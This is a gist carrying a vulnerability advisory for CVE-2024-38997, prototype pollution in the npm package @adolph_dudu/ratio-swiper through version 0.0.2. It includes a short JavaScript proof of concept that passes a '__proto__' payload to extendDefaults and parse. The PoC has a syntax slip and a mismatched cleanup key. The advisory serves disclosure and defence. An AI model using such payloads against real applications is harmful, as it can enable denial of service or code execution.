Skip to content

Instantly share code, notes, and snippets.

@mestrtee

mestrtee/Advisory_Adophlidu.md

Last active July 29, 2024 19:46
Show Gist options
  • Save mestrtee/840f5d160aab4151bd0451cfb822e6b5 to your computer and use it in GitHub Desktop.
Save mestrtee/840f5d160aab4151bd0451cfb822e6b5 to your computer and use it in GitHub Desktop.
Download ZIP
[CVE-2024-38997] Vulnerability Advisory: Prototype Pollution in @adolph_dudu/ratio-swiper, version <= 0.0.2
Raw
Advisory_Adophlidu.md

Vulnerability type: Prototype Pollution

SVSS Score
6.5 MEDIUM

Vendor of the Package: Adophlidu

Affected Package:

  • Product: @adolph_dudu/ratio-swiper
  • Version: 0.0.2

Affected component(s):

extendDefaults, parse

Attack vector(s): the attacker can modify built-in Object.prototype by calling the vulnerable function: extendDefaults, parse with an argument containing a special property __proto__ to pollute the application logic that can be escalated to Denial of service, remote code execution or cross-site scripting attacks.

Description: Affected versions of this package are vulnerable to Prototype Pollution through the vulnerable function: extendDefaults, parse. An attacker can alter the behavior of all objects inheriting from the affected prototype by passing arguments to the vulenrable function crafted with the built-in property: __proto__. The attack can potentially escalated to Denial of service, remote code execution or cross-site scripting attacks depends on the gadgets that may affected by the attack

Proof-of-Concept:

(async () => {
  const lib = await import('@adolph_dudu/ratio-swiper');

  var victim = {}

  console.log("Before Attack: ", JSON.stringify(victim.__proto__));

  try {

  lib.extendDefaults (JSON.parse('{"__proto__":{"test":123}}'))
lib.parse('{"__proto__":{"test":123}}'))

  } catch (e) { }

  console.log("After Attack: ", JSON.stringify(victim.__proto__));

  delete Object.prototype.polluted;

  })();
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment